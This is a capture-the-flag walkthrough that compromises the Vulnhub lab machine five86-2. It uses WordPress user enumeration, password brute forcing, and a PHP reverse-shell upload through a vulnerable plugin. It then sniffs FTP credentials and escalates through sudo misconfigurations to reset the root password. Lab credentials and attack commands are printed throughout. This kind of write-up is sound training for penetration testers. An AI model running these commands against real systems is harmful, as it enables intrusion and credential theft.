five86:-2 Walkthrough Vulnhub CTF Writeup
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Today we are solving five86: 2 is created by DCAUC and This VM is a purposely built vulnerable lab with the intent of gaining experience in the world of penetration testing. five86 2 walkthrough
Every Time our first Step is Finding our target IP address using any toll Today we are using netdiscover
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netdiscover |
Nmap Aggressive scan. All port and services. and wee see target machine port 22 ssh, 80 http WordPress service is running
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nmap -A |
enumerating port 80 http service we already see Nmap scan target machine running WordPress
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we go to wp-login page and we can see the error WordPress URL fixing the error I am adding a hostname our hostname file five86-2 this hostname we are already seeing in URL error
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vi /etc/hosts | five86-2
After adding the target machine hostname our hostname file I run the most popular tool wpscan for WordPress and ( -e u parameter use all WordPress user enumerate )
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wpscan --url http://five86-2 -e u |
After completing our scan we see wpscan output 5 User entry see the image file
- admin
- gillian
- peter
- barney
- stephen
I already create a user.txt file and add every user we found in wpscan
our next step is password Bruteforce attack against 5 users ( -U parameter our user list file directory) and ( -P parameter use password wordlists file )
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wpscan --url http://five86-2 -U user.txt -P /usr/share/wordlists/rockyou.txt |
After completing the password Brute-Force attack we found two usernames and passwords.
- Username: barney
- Password: spooky1
- username: stephen
- password: apollo1
After login the WordPress I go to Plugins Section and we see three plugins After searching all plugin version exploit-db I found a Vulnerable Plugin Insert or Embed Articulate Content into WordPress – Remote Code Execution.
I creating a Simple php oneliner reverse shell and save a file shell.php and I create one another file index.html and compressed a zip file name
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<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/ 0>&1'"); |
I click the post button and we see WordPress hello word! default post I am got to edit section and click the plus button and insert an E-Learning Blog
and Uploading our file and we see the directory e-Learning Block Now before opening our file starting our natcat listener
Now before opening our file starting our Netcat listener and open the shell.php directory
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http://five86-2/wp-content/uploads/articulate_uploads/hacker/shell.php |
We got a target system Netcat reverse connection
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nc -lvp 1234 |
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cd /home |
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id |
Privileges Escalation
and I go to target home directory and see all username and I found a user Stephen we already found the user password wpscan Now changing the shell www-data to Stephen shell
- su stephen
- Password: apollo1
After changing the user we see blank shell now importing python3 to proper shell
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python3 -c 'import pty;pty.spawn("/bin/bash")' |
Id command to see userID and group ID and others ID
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id |
IP add to see all interface name our target machine
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ip add |
changing our directory to user Stephen directory and I dump all TCP packet target machine and save a hacknos.pcap file
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cd stephen |
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timeout 120 tcpdump -w hacknos.pcap -i veth2c37c59 |
After complete TCP dump process, I open the file and I see FTP username and password
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tcpdump -r hacknos.pcap |more |
Changing our using FTP username paul and password esomepasswford
- su paul
- Password: esomepasswford
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id |
sudo -l command to see all user entry sudoers file And I see user peter is run the tool /usr/sbin/service without asking root password
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sudo -l |
I search in google and I found a privilege escalation /service and I run the command and our shell is change paul to peter
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sudo -u peter /usr/sbin/service ../../bin/bash |
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sudo -l |
again sudo -l to see sudoers user entry and we see user peter is run passwd command without asking root password I change the root password and switching normal user to root user shell.
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sudo -u root passwd root |
- New password: toor
- Retype new password: toor
- su root
- Password: toor
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cd /root |
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ls |
target root directory we see our root flag
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cat thisistheflag.txt |
Five86-1 Vulnhub CTF Walkthrough see here